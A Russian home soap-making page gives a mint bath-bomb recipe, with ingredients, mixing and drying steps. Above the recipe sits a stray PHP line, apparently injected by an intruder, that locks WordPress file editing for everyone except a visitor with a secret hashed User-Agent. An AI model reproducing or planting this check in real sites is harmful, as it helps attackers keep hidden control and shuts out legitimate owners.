if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Как сделать своими руками бомбочки для ванны “Мятный взрыв” | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Как сделать своими руками бомбочки для ванны “Мятный взрыв”

Согласитесь, полная ванна горячей воды лучший в этом помощник, а давайте сделаем вечерний отдых еще более комфортным и добавим в него капельку ароматной свежести. Итак, в этом мастер-классе мы научимся делать бомбочки для ванны с ароматом мяты.

Вече­ром, после тру­до­во­го дня толь­ко и меч­та­ешь о том, что­бы отдох­нуть и забыть обо всех делах. Согла­си­тесь, пол­ная ван­на горя­чей воды луч­ший в этом помощ­ник, а давай­те сде­ла­ем вечер­ний отдых еще более ком­форт­ным и доба­вим в него капель­ку аро­мат­ной све­же­сти. Итак, в этом мастер-клас­се мы научим­ся делать бом­боч­ки для ван­ны с аро­ма­том мяты.
Нам понадобятся:

  1. Ступ­ка и пестик (кера­ми­че­ские, если нет мож­но обой­тись неболь­шой мис­кой и ложкой).
  2. Обыч­ная сто­ло­вая ложка.
  3. Рас­пы­ли­тель
  4. Пище­вая плен­ка и рези­но­вые перчатки
  5. Фор­ма для бом­бо­чек (это могут быть и форы для кек­са или дет­ские формочки).
  6. 4 ст.л. соды, 2 ст.л лимон­ной кис­ло­ты, 1 ст.л. соли для ван­ны, 2 ст.л. олив­ко­во­го мас­ла, эфир­ное мас­ло «Мята», 1 ст.л. аптеч­ной тра­вы «Мята»
  7. Бисер для ван­ны ( неболь­шие шари­ки, похо­жие жем­чуг, в теп­лой воде рас­тво­ря­ют­ся и на коже оста­ет­ся мас­ло, кото­рое внут­ри этих кап­сул, купить мож­но в любой апте­ке и нуж­но чуть-чуть).

Наши действия:

Накры­ва­ем стол плен­кой, наде­ва­ем пер­чат­ки и сме­ши­ва­ем в ступ­ке соду и кис­ло­ту лимон­ную (рас­ти­рать очень хоро­шо!), затем при­ме­ши­ва­ем сюда сухие слив­ки и опять пере­ме­ши­ва­ем, после по той же схе­ме: 2 ст.ложки олив­ко­во­го мас­ла, 15–20 капель мас­ла эфир­но­го, затем соль для ван­ны, мяту из апте­ки и бисер. Все очень хоро­шо пере­ме­ши­ва­ем, затем водой из рас­пы­ли­те­ля для рав­но­мер­но­го увлаж­не­ния полу­чен­ной мас­сы акку­рат­но взбрызгиваем.

ВАЖНО! Воды мно­го не лить!

Гото­вая мас­са долж­ны сли­пать­ся. Затем смажь­те гото­вую фор­му олив­ко­вым мас­лом и уло­жи­те туда полу­чен­ную мас­су (если фор­мы нет, мож­но про­из­воль­но нале­пить шари­ков). Сушить бом­боч­ки нуж­но несколь­ко часов на листе бума­ги, после про­сто бро­са­е­те ее в ван­ну с водой и насла­жда­е­тесь! А в про­дол­же­нии — смот­ри­те 11 видео­уро­ков по изго­тов­ле­нию таких бомбочек!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Rio Rita

Обожаю мыловарение и всегда рада поделиться своими знаниями с мыловарами :) Читайте все мои записи!